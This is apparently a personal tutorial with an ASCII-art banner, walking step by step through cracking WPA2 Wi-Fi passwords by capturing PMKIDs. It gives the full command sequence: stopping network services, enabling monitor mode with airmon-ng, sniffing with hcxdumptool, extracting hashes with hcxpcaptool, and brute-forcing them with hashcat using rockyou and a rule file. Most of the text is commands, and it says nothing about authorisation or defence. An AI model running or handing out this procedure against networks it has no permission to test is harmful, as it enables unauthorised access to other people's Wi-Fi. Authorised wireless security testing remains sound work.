___ _________________ / _ \/ _/ _/_ __/ _ | / // // /_/ / / / / __ | /____/___/___/ /_/ /_/ |_|

 Ruleset lists added   WPA2 Cracking with PMKID's added 
This guide will briefly show you what steps to take to 'bruteforce' WPA2 encryption.
This is all tested on a Debian distribution.
If you want to know why I use certain arguments with the tools, just take a look at `man 'toolname'`

  • ifconfig

  • airmon-ng

  • hcxdumptool

  • hcxpcaptool

  • hcxpsktool optional

  • hashcat

  • Own dictionaries, rules and/or masks

First of all check what adapter you're going to use. Must support 'monitor' mode
  ifconfig -a

Double-check that your wlan adapter is down. (I'm going to reference to wlan0 from now on)
  ifconfig wlan0 down

Now stop the following services, they can interfere with the channel switching of hcxdumptool.
  service network-manager stop
  service wpa_supplicant stop

Put the interface in monitor mode.
  airmon-ng start wlan0

Start dumping the packets, and enable status 3 is to also capture EAPOL and PROBEREQUEST/PROBERESPONSE
  hcxdumptool -o testing.pcapng -i wlan0mon --enable_status 3

Just wait for a while and keep an eye on the bottom status bar.
Look for the
'pwned' tag. It will tell you approximately how many PMKID's it has captured.
Grab some java while you wait, it won't take long to capture though.

After you've been sniffing the airways for a while, stop the capture by using

Now grab the PMKID's and name the file *.16800, you'll find out why in the following step.
  hcxpcaptool -E essids -z testing.16800 testing.pcapng

There are multiple ways to bruteforce or use a dictionary attack, I prefer using hashcat.
It makes great use of my graphic cards.

  hashcat -m 16800 testing.16800 -w 4 -a 0 --force --potfile-path=testing.pot -r '/rules/hob064.rule' '/dict/rockyou.txt'

As you can see I use a rule and a dictionary, I'll post another page on why I use certain rulesets and dictionaries and how to get them.
This is the waiting part, the longer the password
(min-length=8 for WPA), the more time the bruteforce/dictionary/rainbow etc. attack will take.
The cracked password(s) will be put into the
'testing.pot' file.